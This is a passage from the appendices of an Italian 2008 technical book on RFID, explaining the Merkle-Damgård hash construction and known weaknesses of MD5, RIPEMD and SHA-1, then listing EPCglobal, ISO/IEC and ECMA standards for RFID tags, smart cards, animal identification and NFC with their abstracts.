II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 418

Page 403: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Nel diagramma in Figura IX.7:- L’algoritmo viene innescato da un “Initialization Vector – IV; ovverouna stringa di bit che permette di inizializzare la prima funzione dicompressione. L’IV deve essere noto al ricevitore per decrittare lasequenza.

- La funzione di compressione f trasforma una stringa di lunghezza fissain ingresso in una stringa della stessa lunghezza in uscita.

- Eventualmente l’ultimo blocco viene completato alla lunghezza defini-ta (length padding).

- Ad esempio se i blocchi da cifrare sono lunghi 128 bit, la maggior partedei metodi crea impronte (dell’intera stringa) di 128 bit. Esistonoanche metodi per costruire hash con impronta doppia della lunghezzadei blocchi.

- Come blocco finale, la “finalization function” effettua la compressione deibit rapperesentativi dello stato interno della macchina, generando unauscita di dimensioni minori che sarà l’impronta della stringa in ingresso.

LISTA DELLE COMUNI FUNZIONI HASH

La Tabella IX.4 illustra la lista delle più comuni funzioni hash, alcunedelle quali, peraltro sono considerate insicure.

PARTE IX - APPENDICI & BIBLIOGRAFIA419

Figura IX.7Metodo “Merkle-Damgård” per realizzare

una funzione hash [Wikipedia].

IX.3.1

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 419

Page 404: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva420

Nota: Per “internal state” si intende la cosiddetta "internal hash sum"dopo ogni compressione di un blocco di dati. La maggior parte degli algo-ritmi usa alcune variabili addizionali come l’attuale lunghezza dei daticompressi necessaria per l’eventuale completamento del blocco finale.

Nei vari standard ed applicazioni le due funzioni hash più comunemen-te usate sono MD5 e SHA-1. Entrambe, però, presentano punti deboli.Nell’ambito della conferenza CRYPTO ’04, infatti, alcuni ricercatori

cinesi hanno dimostrato un metodo per generare collisioni in alcune fra lepiù note e diffuse funzioni hash, in particolare MD5 e RIPEMD. Peraltrola scarsa lunghezza dell’impronta da esse generata (128 bit per entrambe)era già da parecchio tempo giudicata insufficiente a contrastare gli attac-chi. La funzione MD5, infatti, pur essendo uno standard Internet(RFC1321) era già da tempo “sconsigliata” e non viene praticamente piùimpiegata in applicazioni critiche.La RIPEMD, invece, era già stata ufficialmente abolita e sostituita, sin

dal 1996, con la RIPEMD-160, sviluppata nell’ambito del progetto RIPE(RACE Integrity Primitives Evaluation) dell’Unione Europea, che utilizzauna struttura matematica più robusta, produce un’impronta dalla lun-

Tabella IX.4Funzioni hash crittografiche

[Wikipedia]

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 420

Page 405: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IX - APPENDICI & BIBLIOGRAFIA421

ghezza di 160 bit, ed è ancora totalmente immune da attacchi noti.Le funzioni SHA sono una serie di funzioni hash sviluppate dall’NSA

(National Security Agency, USA): SHA-0, SHA1 e 4 versioni di una fun-zione denominata SHA-2.Per quanto riguarda SHA-1, che produce un’impronta di 160 bit,

anche per questa ricercatori cinesi hanno dimostrato che la robustezzaeffettiva dell'algoritmo non coincide,con quella teorica.Tuttavia considerando sia le potenze di calcolo realmente disponibili,

sia le previste evoluzioni di queste nel tempo, c'è probabilmente tutto iltempo di adottare un algoritmo di hash più robusto di SHA-1 prima chequesto possa essere considerato realmente compromesso.Altri risultati, presentati quasi contemporaneamente da ricercatori

israeliani e francesi, hanno dimostrato l’esistenza pratica di collisioni inSHA-0 (che peraltro già si sapeva essere teoricamente debole); e talemetodo di attacco però non sembra applicabile a SHA-1.Comunque il NIST (National Institute of Science and Technology)

americano sta già da qualche tempo valutando alcune versioni estese diSHA-1, denominate SHA-256 e SHA-512, che non dovrebbero soffriredelle vulnerabilità identificate in SHA-1.La legge italiana ammette come valide solo le firme che utilizzano le

funzioni hash SHA-1 e RIPEMD-160.

Fonti: Wikipedia, “Cryptographic hash function” e “Le funzioni hash”di Corrado Giustozzi da www.interlex.it

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 421

Page 406: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva422

APPENDICE D – COMPENDIO DEGLI STANDARDEPCGLOBAL, ISO ED ECMA

NORME EPCGLOBAL

4.1.1 EPCglobal Specifications

- 900 MHz Class 0 Radio Frequency (RF) Identification Tag Specification.Auto-ID Center, Feb 2003Draft protocol specification for a 900 MHz Class 0 Radio FrequencyIdentification TagThis document specifies the communications interface and protocol for 900 MHzClass 0 operation.It includes the RF and tag requirements and provides operational algorithms toenable communications in this band.

- 13.56 MHz ISM Band Class 1 Radio Frequency (RF) Identification Tag InterfaceSpecification.Auto-ID Center, Feb 200313.56 MHz ISM Band Class 1Radio Frequency Identification Tag InterfaceSpecificationThis specification defines the communications interface and protocol for 13.56MHz Class 1 operation.It also includes the RF and tag requirements to enable communications in this band.

- 860MHz -- 930 MHz Class 1 Radio Frequency (RF) Identification Tag RadioFrequency & Logical Communication Interface Specification.Auto-ID Center, Nov 2002860MHz–930MHz Class I Radio Frequency Identification Tag Radio Frequency& Logical Communication Interface SpecificationThis document specifies the communications interface and protocol for 860 - 930MHz Class 1 operation.It includes the RF and tag requirements to enable communications in this band.

– Class-1 Generation-2 UHF RFID Conformance Requirements Specification v. 1.0.2EPCglobal, Version 1.0.2 , Feb 2005EPC™ Radio-Frequency Identity ProtocolsClass-1 Generation-2 UHF RFIDConformance RequirementsThis document specifies the following for the EPCglobal Class-1 Generation-2UHF RFID• Protocol for Communications at 860 MHz – 960 MHz (the Protocol):• Compliance requirements for physical interactions (the signaling layer of thecommunications) between Interrogators and Tags, and• Compliance requirements for Interrogator and Tag operating procedures andcommands.

IX.4

IX.4.1

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 422

Page 407: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IX - APPENDICI & BIBLIOGRAFIA423

– EPCglobal Architecture Framework Version 1.0.This document defines and describes the EPCglobal Architecture Framework.The EPCglobal Architecture Framework is a collection of interrelated standardsfor hardware, software, and data interfaces, together with core services that areoperated by EPCglobal and its delegates, all in service of a common goal of enhan-cing the supply chain through the use of Electronic Product Codes™ (EPCs).

4.1.2 Ratified EPCglobal Standards

– EPC Tag Data Standard Version 1.1 rev 1.27 -This EPCglobal Board Ratified standard identifies the specific encoding schemesfor a serialized version of the EAN.UCC Global Trade Item Number (GTIN®),the EAN.UCC Serial Shipping Container Code (SSCC®), the EAN.UCC GlobalLocation Number (GLN®), the EAN.UCC Global Returnable Asset Identifier(GRAI®), the EAN.UCC Global Individual Asset Identifier (GIAI®), and aGeneral Identifier (GID).This latest revision adds the DoD construct header and the hexadecimal expres-sion for raw URI representation.

– EPCglobal Tag Data Standards Version 1.3 -EPCglobal, Version 1.3, March 8, 2006 -Tag Data Standards - RatifiedSpecificationThis document defines the EPC Tag Data Standards version 1.3. It applies to RFIDtags conforming to “EPC Radio-Frequency Identity Protocols Class-1 Generation-2 UHF RFID Protocol for Communications at 860 MHz-960MHz Version 1.0.9”(“Gen2 Specification”). Such tags will be referred to as “Gen 2 Tags” in theremainder of this document.These standards define completely that portion of EPC tag data that is standardi-zed, including how that data is encoded on the EPC tag itself (i.e. the EPC TagEncodings), as well as how it is encoded for use in the information systems layersof the EPC Systems Network (i.e. the EPC URI or Uniform Resource IdentifierEncodings).

– EPCglobal Tag Data Translation (TDT) 1.0 Ratified Standard Specification -This EPC Tag Data Translation (TDT) specification is concerned with a machine-readable version of the EPC Tag Data Standards specification.The machine-readable version can be readily used for validating EPC formats aswell as translating between the different levels of representation in a consistent way.This specification describes how to interpret the machine-readable version. It con-tains details of the structure and elements of the machine-readable markup filesand provides guidance on how it might be used in automatic translation or valida-tion software, whether standalone or embedded in other systems.Important Note on Compatibility: Version 1.0 of the TDT specification is fullycompatible with TDS Version 1.1 Rev. 1.27.

– Class 1 Generation 2 UHF Air Interface Protocol Standard Version 1.0.9 -EPCglobal, Version 1.0.9, January 2005

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 423

Page 408: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva424

Radio-Frequency Identity ProtocolsClass-1 Generation-2 UHF RFIDProtocol for Communications at 860 MHz – 960 MHzRatified StandardThis EPCglobal Board Ratified standard defines the physical and logical require-ments for a passive-backscatter, Interrogator-talks-first (ITF), radio-frequencyidentification (RFID) system operating in the 860 MHz - 960 MHz frequencyrange. The system comprises Interrogators, also known as Readers, and Tags, alsoknown as Labels.

– Application Level Event (ALE) Specification Version 1.0 -This EPCglobal Board-ratified standard specifies an interface through whichclients may obtain filtered, consolidated Electronic Product Code™ (EPC) datafrom a variety of sources.

– Object Naming Service (ONS) Specification Version 1.0 -This document specifies how the Domain Name System is used to locate authori-tative metadata and services associated with the SGTIN portion of a givenElectronic Product Code™ (EPC). Its target audience is developers that will beimplementing Object Naming Service (ONS) resolution systems for applications.

– EPCglobal Certificate Profile -The authentication of entities (subscribers, services, physical devices) operatingwithin the EPCglobal network serves as the foundation of any security functionincorporated into the network.The EPCglobal architecture allows the use of a variety of authentication technolo-gies across its defined interfaces.It is expected, however, that the X.509 authentication framework will be widelyemployed within the EPCglobal network.To ensure broad interoperability and rapid deployment while ensuring secureusage, this document defines a profile of X.509 certificate issuance and usage byentities in the EPCglobal network.The profiles defined in this document are based upon two Internet standards, defi-ned in the IETF's PKIXWorking Group, that have been well implemented, deplo-yed and tested in many existing environments.

STANDARD ISO SU TECNICHE DI SICUREZZA

ISO/IEC 9798-1:1997Information technology -- Security techniques -- Entity authentication -- Part 1:GeneralAbstractISO/IEC 9798-1 describes the general model for the entity authentication mecha-nisms of ISO/IEC 9798-2 (using symmetric encipherment algorithms), ISO/IEC9798-3 (using a public key algorithm), ISO/IEC 9798-4 (using a cryptographic checkfunction) and the future ISO/IEC 9798-5 (using asymmetric zero knowledge techni-ques). It contains definitions and notation, describes the authentication model and

IX.4.2

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 424

Page 409: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IX - APPENDICI & BIBLIOGRAFIA425

discusses requirements and constraints common to the other parts. The standard alsocontains informative annexes on the use of text fields, on time variant parameters(time stamps, sequence numbers, or random numbers), and on certificates.

ISO/IEC 9798-2:1999Information technology -- Security techniques -- Entity authentication -- Part 2:Mechanisms using symmetric encipherment algorithmsAbstractThe document describes the required content of messages which are necessary to setup the conditions for entity authentication. This may be unilateral authentication, bymeans of which only a single entity is authenticated, or mutual authentication, wherethe two entities authenticate each other. This part of ISO/IEC 9798 specifies fourauthentication mechanisms where no trusted third party is involved. Two of these fourare concerned with unilateral authentication while the other two specify mechanismsfor mutual authentication. In addition, two mechanisms involving a trusted third partyare specified. They can be used for unilateral or mutual authentication depending onthe number of messages exchanged.Messages may contain text fields the use and relationship of which is not specified inthis standard. The standard contains an informative annex on their use which could,for instance, be key distribution. Some of the key distribution mechanisms specified inISO/IEC 11770-2 make use of the mechanisms specified in this part of ISO/IEC 9798.

ISO/IEC 9798-3:1998Information technology -- Security techniques -- Entity authentication -- Part 3:Mechanisms using digital signature techniquesAbstractThe standard describes two mechanisms for unilateral authentication and threemechanisms for mutual authentication. In a unilateral authentication mechanism onlyone of the two entities is authenticated while in a procedure for mutual authenticationthe two communicating entities authenticate each other. Messages are sent betweenthe claimant and the verifier for the verification of the claimant's identity. A messagecontains a signed part and an unsigned part. If information in the signed part of themessage is already known to the verifier then it needs not be contained in the unsi-gned part. The provision of data in the unsigned part may also depend on the proper-ties of the algorithm employed. To control uniqueness/timeliness of the messages (which, for example, prevents valid authentication information from being accepted ata later time) the messages contain time variant parameters such as time stamps,sequence numbers and random numbers. Their properties are described as in aninformative annex. Implementation requirements may make different time variantparameters preferable in different applications.Messages may contain text fields the use and relationship of which is not specified inthis standard. The standard contains an informative annex on their use which could,for instance, be key distribution. Some of the key distribution mechanisms specified inISO/IEC 11770-3 makes use of the mechanisms specified in this part of ISO/IEC 9798.

ISO/IEC 9798-4:1999Information technology -- Security techniques -- Entity authentication -- Part 4:Mechanisms using a cryptographic check function

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 425

Page 410: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva426

AbstractThe document describes the required content of messages which are necessary to setup the conditions for entity authentication. This may be unilateral authentication, bymeans of which only a single entity is authenticated, or mutual authentication, wherethe two entities authenticate each other. This part of ISO/IEC specifies four authen-tication mechanisms. Two of these four are concerned with unilateral authenticationwhile the other two specify mechanisms for mutual authentication.Messages may contain text fields the use and relationship of which is not specified inthis standard. The standard contains an informative annex on their use which could,for instance, be key distribution.

ISO/IEC 9798-5:2004Information technology -- Security techniques -- Entity authentication -- Part 5:Mechanisms using zero-knowledge techniquesAbstractISO/IEC 9798-5:2004 specifies authentication mechanisms in the form of exchange ofinformation between a claimant and a verifier.In accordance with the types of calculations that need to be performed by a claimantand the verifier (see Annex C), the mechanisms specified in ISO/IEC 9798-5:2004 canbe classified into four main groups.- The first group is characterized by the performance of short modular exponentia-

tions. The challenge size needs to be optimized since it has a proportional impacton workloads.

- The second group is characterized by the possibility of a "coupon" strategy for theclaimant. A verifier can authenticate a claimant without computational power. Thechallenge size has no impact on workloads.

- The third group is characterized by the possibility of a "coupon" strategy for theverifier. A verifier without computational power can authenticate a claimant. Thechallenge size has no impact on workloads.

- The fourth group has no possibility of a "coupon" strategy.

ISO/IEC 9798-6:2005Information technology -- Security techniques -- Entity authentication -- Part 6:Mechanisms using manual data transferAbstractISO/IEC 9798-6:2005 specifies four entity authentication mechanisms based onmanual data transfer between authenticating devices. Such mechanisms may beappropriate in a variety of circumstances. One such application occurs in PersonalArea Networks, where the owner of two personal devices capable of wireless commu-nications wishes them to perform an entity authentication procedure as part of theprocess of preparing them for use in the network. These mechanisms may also be usedto support key management functions.ISO/IEC 9798-6:2005 specifies mechanisms in which entity authentication is achieved by- manually transferring short data strings from one device to the other,- manually comparing short data strings output by the two devices.In ISO/IEC 9798-6:2005, the meaning of the term entity authentication is different tothe meaning applied in other parts of ISO/IEC 9798. Instead of one device verifyingthat the other device has a claimed identity (and vice versa), both devices in posses-

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 426

Page 411: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IX - APPENDICI & BIBLIOGRAFIA427

sion of a user verify that they correctly share a data string with the other device at thetime of execution of the mechanism. Of course, this data string could contain identi-fiers for one or both of the devices.

STANDARD ISO SU IDENTIFICAZIONE DI ANIMALI

TC 23/SC 19 Agricultural electronics

ISO 11784:1996Radio frequency identification of animals -- Code structureAbstractContains the structure of the radio-frequency identification code for animals. Doesnot specify the characteristics of the transmission protocols between transponder andtransceiver. Replaces the first edition.

ISO 11784:1996/Amd 1:2004

ISO 11785:1996Radio frequency identification of animals -- Technical concept

ISO 14223-1:2003Radiofrequency identification of animals -- Advanced transponders -- Part 1: AirinterfaceAbstractISO 14223:2003 specifies the air interface between the transceiver and the advancedtransponder used in the radiofrequency identification of animals under the conditionof full upward compatibility according to ISO 11784 and ISO 11785.

ISO/CD 24631-1Radio frequency identification of animals -- Part 1: Conformance evaluation of RFIDtransponders including granting and use of a manufacturer code

ISO/CD 24631-2Radio frequency identification of animals -- Part 2: ISO 11784/11785 Conformanceevaluation of RFID transceivers

ISO/CD 24631-3Radio frequency identification of animals -- Part 3: ISO 11784/11785 Conformanceevaluation of RFID transceivers

ISO/CD 24631-4Radio frequency identification of animals -- Part 4: ISO 11784/11785 Conformanceevaluation of RFID transceivers

IX.4.3

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 427

Page 412: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva428

CARTE ELETTRONICHE SENZA CONTATTO

TC 1/SC 17 Cards and personal identification

ISO/IEC 7810:2003Identification cards -- Physical characteristicsAbstractISO/IEC 7810:2003 is one of a series of standards describing the characteristics ofidentification cards. It is the purpose of ISO/IEC 7810:2003 to provide criteria towhich cards shall perform and to specify the requirements for such cards used forinternational interchange. It takes into consideration both human and machineaspects and states minimum requirements.ISO/IEC 7810:2003 specifies:– four different sizes of identification cards with a nominal thickness of 0,76 mm and

dimensions of:– ID-000 25 mm x 15 mm,– ID-1 85,60 mm x 53,98 mm,– ID-2 105 mm x 74 mm,– ID-3 125 mm x 88 mm;

– the conditions for conformance;– the dimensions and tolerances of the identification cards;– the construction and materials of the identification cards; and– the physical characteristics of the cards such as bending stiffness, flammability,

toxicity, resistance to chemicals, dimensional stability, adhesion or blocking, war-page, resistance to heat, surface distortions, and contamination.

ISO/IEC 7810:2003, together with a standard for test methods, provides for inter-change between various types of identification card processing devices and systems.

4.4.1 Integrated circuit(s) cards

ISO/IEC 7816-1:1998Identification cards -- Integrated circuit(s) cards with contacts -- Part 1: Physical cha-racteristics

ISO/IEC 7816-1:1998/Amd 1:2003Maximum height of the IC contact surface (available in English only)

ISO/IEC 7816-2:1999Identification cards -- Integrated circuit cards -- Part 2: Cards with contacts --Dimensions and location of the contacts

ISO/IEC 7816-2:1999/Amd 1:2004Assignment of contacts C4 and C8 (available in English only)

ISO/IEC 7816-3:1997Information technology -- Identification cards -- Integrated circuit(s) cards with con-tacts -- Part 3: Electronic signals and transmission protocols

IX.4.4

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 428

Page 413: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IX - APPENDICI & BIBLIOGRAFIA429

ISO/IEC 7816-3:1997/Amd 1:2002Electrical characteristics and class indication for integrated circuit(s) cards operatingat 5 V, 3 V and 1,8 V (available in English only)

ISO/IEC 7816-4:2005Identification cards -- Integrated circuit cards -- Part 4: Organization, security andcommands for interchange (available in English only)AbstractISO/IEC 7816-4:2005 specifies: contents of command-response pairs exchanged at theinterface, means of retrieval of data elements and data objects in the card, structuresand contents of historical bytes to describe operating characteristics of the card, struc-tures for applications and data in the card, as seen at the interface when processingcommands, access methods to files and data in the card, a security architecture definingaccess rights to files and data in the card, means and mechanisms for identifying andaddressing applications in the card, methods for secure messaging, access methods tothe algorithms processed by the card. It does not describe these algorithms. It does notcover the internal implementation within the card or the outside world.ISO/IEC 7816-4:2005 is independent from the physical interface technology. Itapplies to cards accessed by one or more of the following methods: contacts, closecoupling, and radio frequency.

ISO/IEC 7816-5:2004Identification cards -- Integrated circuit cards -- Part 5: Registration of applicationproviders (available in English only)

ISO/IEC 7816-6:2004Identification cards -- Integrated circuit cards -- Part 6: Interindustry data elementsfor interchange (available in English only)

ISO/IEC 7816-6:2004/Cor 1:2006

ISO/IEC 7816-7:1999Identification cards -- Integrated circuit(s) cards with contacts -- Part 7: Interindustrycommands for Structured Card Query Language (SCQL) (available in English only)

ISO/IEC 7816-8:2004Identification cards -- Integrated circuit cards -- Part 8: Commands for security ope-rations (available in English only)

ISO/IEC 7816-9:2004Identification cards -- Integrated circuit cards -- Part 9: Commands for card manage-ment (available in English only)

ISO/IEC 7816-10:1999Identification cards -- Integrated circuit(s) cards with contacts -- Part 10: Electronicsignals and answer to reset for synchronous cards (available in English only)

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 429

Page 414: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva430

ISO/IEC 7816-11:2004Identification cards -- Integrated circuit cards -- Part 11: Personal verification throughbiometric methods (available in English only)

ISO/IEC 7816-12:2005Identification cards - Integrated circuit cards -- Part 12: Cards with contacts -- USBelectrical interface and operating procedures (available in English only)

ISO/IEC 7816-15:2004Identification cards -- Integrated circuit cards -- Part 15: Cryptographic informationapplication (available in English only)

ISO/IEC 7816-15:2004/Cor 1:2004

4.4.2 Close-coupled cards

ISO/IEC 10536-1:2000Identification cards -- Contactless integrated circuit(s) cards -- Close-coupled cards --Part 1: Physical characteristics

ISO/IEC 10536-2:1995Identification cards -- Contactless integrated circuit(s) cards -- Part 2: Dimensions andlocation of coupling areasAbstractSpecifies the dimensions, location, nature and assignment of each of the couplingareas to be provided for interfacing slot or surface card coupling devices (CCDs) withcontactless integrated circuit(s) cards (CICCs) of the ID-1 card type.

ISO/IEC 10536-3:1996Identification cards -- Contactless integrated circuit(s) cards -- Part 3: Electronicsignals and reset procedures (available in English only)AbstractSpecifies the nature and characteristics of the fields to be provided for power andbidirectional communications between card coupling devices and contactless integra-ted circuit(s) cards of the ID-1 card type in slot or surface operation. Is to be used inconjunction with ISO/IEC 10536-1 and ISO/IEC 10536-2.

4.4.3 Proximity cards

Contact Less Smartcard [ http://www.nfc-research.at/index.php?mID=246 ]ISO 14443 defines a proximity card used for identification that usually uses the stan-dard credit card form factor defined by ISO 7810 ID-1. Other form factors also arepossible. The ID cards use an embedded microcontroller (including its own micropro-cessor and several types of memory) and a magnetic loop antenna that operates at13.56 MHz (RFID). More recent ICAO standards for machine-readable travel docu-ments specify a cryptographically-signed file format and authentication protocol for

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 430

Page 415: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IX - APPENDICI & BIBLIOGRAFIA431

storing biometric features (photos of the face, fingerprints, and/or iris).ISO14443 consists of four parts and describes two types of cards: type A and type B.The main differences between these types concern modulation methods, coding sche-mes (part 2) and protocol initialization procedures (part 3). Both type A and type Bcards uses the same high-level protocol (so called T=CL) described in part 4. T=CLprotocol specifies data block exchange and related mechanisms

ISO/IEC 14443-1:2000Identification cards - Contactless integrated circuit(s) cards - Proximity cards -Part 1: Physical characteristics

ISO/IEC 14443-2:2001Identification cards - Contactless integrated circuit(s) cards - Proximity cards -Part 2: Radio frequency power and signal interface

ISO/IEC 14443-2:2001/Amd 1:2005Bit rates of fc/64, fc/32 and fc/16

ISO/IEC 14443-3:2001Identification cards - Contactless integrated circuit(s) cards - Proximity cards -Part 3: Initialization and anticollision

ISO/IEC 14443-3:2001/Amd 1:2005Bit rates of fc/64, fc/32 and fc/16

ISO/IEC 14443-3:2001/Amd 1:2005/Cor 1:2006

ISO/IEC 14443-3:2001/Amd 3:2006Handling of reserved fields and values

ISO/IEC 14443-4:2001Identification cards - Contactless integrated circuit(s) cards - Proximity cards -Part 4: Transmission protocol

ISO/IEC 14443-4:2001/Amd 1:2006Handling of reserved fields and values

4.4.4 Vicinity cards

Smart Labels (RFID Tags)ISO/IEC 15693 is one of a series of International Standards describing the parame-ters for identification cards defined in ISO 7810 and the use of such cards for inter-national interchange.ISO 15693 systems operate on 13.56MHz frequency, and offer maximum read distance of1-1.5 metre. An example of this being the Radio Identification circuits used to collect tollelectronically these days. As the vicinity cards have to operate at a greater distance, the neces-sary magnetic field is less (0.15 to 5 A/m) than that for a proximity card (1,5 to 7,5 A/m).

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 431

Page 416: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva432

ISO/IEC 15693-1:2000JTC 1/SC 17 - Identification cards -- Contactless integrated circuit(s) cards -- Vicinitycards -- Part 1: Physical characteristics

ISO/IEC 15693-2:2000JTC 1/SC 17 - Identification cards -- Contactless integrated circuit(s) cards -- Vicinitycards -- Part 2: Air interface and initialization

ISO/IEC 15693-2:2000/Cor 1:2001

ISO/IEC 15693-3:2001JTC 1/SC 17 - Identification cards - Contactless integrated circuit(s) cards - Vicinitycards -- Part 3: Anticollision and transmission protocol (available in English only)

4.4.5 Standard proprietari per carte senza contatto

Sony FeliCa [http://www.nfc-research.at/index.php?mID=247 ]FeliCa is a contactless IC card technology developed by Sony. As the name stemmingfrom the word "felicity" suggests, the system was born to make daily living easier andmore convenient. The card is difficult to forge/reconstruct, and allows to send/receivedata at high speed and with high security. The system is also environment-friendly sincethe card can be used over-and-over virtually forever by rewriting the data. It also fea-tures ultimate user-ease, as would be expected from a contactless card, since there is nolonger any need to retrieve and put away the card for every use. All-in-all, the system isrational throughout, since one card is enough to provide for various purposes.

Philips Mifare [ http://www.nfc-research.at/index.php?mID=244 ]Fully compliant with ISO 14443A, MIFARE® is the industry standard for contact lessand dual interface smart card schemes. With an immense worldwide installed base, itis a well proven RF communication technology for transmitting data between a cardand a reader device. The platform offers a full range of compatible contact less smartcard and reader ICs, as well as dual interface ICs that provide a secure link betweenthe contact less and contact card markets. The key application for the MIFARE®Interface Platform is electronic ticketing in public transport. Travelers just wave theircard over a reader at the turnstiles or entry, benefiting from improved convenienceand speed in the ticketing process. MIFARE® products are set to be the key to indi-vidual mobility in the future, supporting multiple applications including road tolling,airline tickets, access control and many more.

ISO/ECMA STANDARD SU NFC

ISO/IEC 18092:2004 -- Information technology -- Telecommunications and informa-tion exchange between systems -- Near Field Communication -- Interface andProtocol (NFCIP-1)AbstractISO/IEC 18092:2004 defines communication modes for Near Field Communication

IX.4.5

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 432

Page 417: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IX - APPENDICI & BIBLIOGRAFIA433

Interface and Protocol (NFCIP-1) using inductive coupled devices operating at thecentre frequency of 13,56 MHz for interconnection of computer peripherals. It alsodefines both the Active and the Passive communication modes of NFCIP-1 to realizea communication network using Near Field Communication devices for networkedproducts and also for consumer equipment. This International Standard specifies, inparticular, modulation schemes, codings, transfer speeds and frame format of the RFinterface, as well as initialization schemes and conditions required for data collisioncontrol during initialization. Furthermore, this International Standard defines a trans-port protocol including protocol activation and data exchange methods.Information interchange between systems also requires, at a minimum, agreement bet-ween the interchange parties upon the interchange codes and the data structure.

ISO/IEC 21481:2005 - Information technology -- Telecommunications and informa-tion exchange between systems -- Near Field Communication Interface and Protocol-2 (NFCIP-2)AbstractISO/IEC 21481:2005 specifies the communication mode selection mechanism, desi-gned not to disturb any ongoing communication at 13,56 MHz, for devices implemen-ting ISO/IEC 18092 and the reader functionality for integrated circuit cards com-pliant with ISO/IEC 14443 or ISO/IEC 15693. ISO/IEC 21481:2005 requires imple-mentations to enter the selected communication mode as specified in the respectiveInternational Standard. The communication mode specifications, however, are outsi-de the scope of this NFCIP-2 International Standard.

ISO/IEC DIS 28361 -- Information technology -- Near Field Communication WiredInterface (NFC-WI) (ECMA-373)

ISO/IEC 22536:2005 - Information technology - Telecommunications and informa-tion exchange between systems - Near Field Communication Interface and Protocol(NFCIP-1) - RF interface test methodsAbstractISO/IEC 22536:2005 is part of a suite of standards that specify tests for ISO/IEC18092. It defines test methods for the RF-interface. ISO/IEC 22536:2005 specifiesRF-test methods for NFC devices with antennas fitting within the rectangular area of85 mm by 54 mm.This test standard, the first of two parts, specifies compliance tests for the RF interfa-ce of ISO/IEC 18092 devices. The companion test standard specifies protocol testsfor ISO/IEC 18092.Ecma purposefully aligned this International Standard with ISO/IEC 10373-6 toallow testing laboratories to reuse equipment and expertise.

ISO/IEC 23917:2005 - Information technology - Telecommunications and informa-tion exchange between systems - NFCIP-1 - Protocol Test MethodsAbstractISO/IEC 23917:2005 specifies protocol test methods for ISO/IEC 18092 in additionto those specified in ISO/IEC 22536.

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 433

Page 418: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva434

EMCA 340 - Near Field Communication Interface and Protocol (NFCIP-1)AbstractThis Standard defines communication modes for Near Field CommunicationInterface and Protocol (NFCIP 1) using inductive coupled devices operating at thecentre frequency of 13,56 MHz for interconnection of computer peripherals. It alsodefines both the Active and the Passive communication modes of Near FieldCommunication Interface and Protocol (NFCIP-1) to realize a communication net-work using Near Field Communication devices for networked products and also forconsumer equipment. This Standard specifies, in particular, modulation schemes,codings, transfer speeds, and frame format of the RF interface, as well as initializationschemes and conditions required for data collision control during initialization.Furthermore, this Standard defines a transport protocol including protocol activationand data exchange methods. Information interchange between systems also requires,at a minimum, agreement between the interchange parties upon the interchange codesand the data structure.This Ecma publication is also approved as ISO/IEC 18092

ECMA-352 - Near Field Communication Interface and Protocol -2 (NFCIP-2) -(December 2003)AbstractECMA-340, ISO/IEC 14443 and ISO/IEC 15693 standards specify the RF signalinterface, initialisation, anti-collision and protocols for wireless interconnection of clo-sely coupled devices and access to contactless integrated circuit cards operating at13,56 MHz.This Standard specifies the communication mode selection mechanism, designed tonot disturb any ongoing communication at 13,56 MHz, for devices implementingECMA-340 and the reader functionality for integrated circuit cards compliant toISO/IEC 14443 or ISO/IEC 15693. This standard mandates that conforming imple-mentations enter the selected communication mode as specified in the respective stan-dard. The communication mode specifications themselves, however, are outside thescope of this NFCIP-2 Standard.This Ecma publication is also approved as ISO/IEC 21481

ECMA-373 - Near Field Communication Wired Interface (NFC–WI) - (June 2006)AbstractThis Ecma Standard specifies the digital wire interface between a Transceiver and aFront-end. The specification includes the signal wires, binary signals, the state dia-grams and the bit encodings for three data rates.ISO/IEC DIS 28361

ECMA-356 - NFCIP-1 - RF Interface Test Methods - (June 2004)AbstractThis Ecma Standard is the companion of ECMA-362, both specify tests for ECMA-340 (NFCIP-1). This Standard specifies RF-test methods for NFCIP-1 devices withantennas fitting within the rectangular area of 85 mm by 54 mm.This Ecma publication is also approved as ISO/IEC 22536

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 434

Page 419: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IX - APPENDICI & BIBLIOGRAFIA435

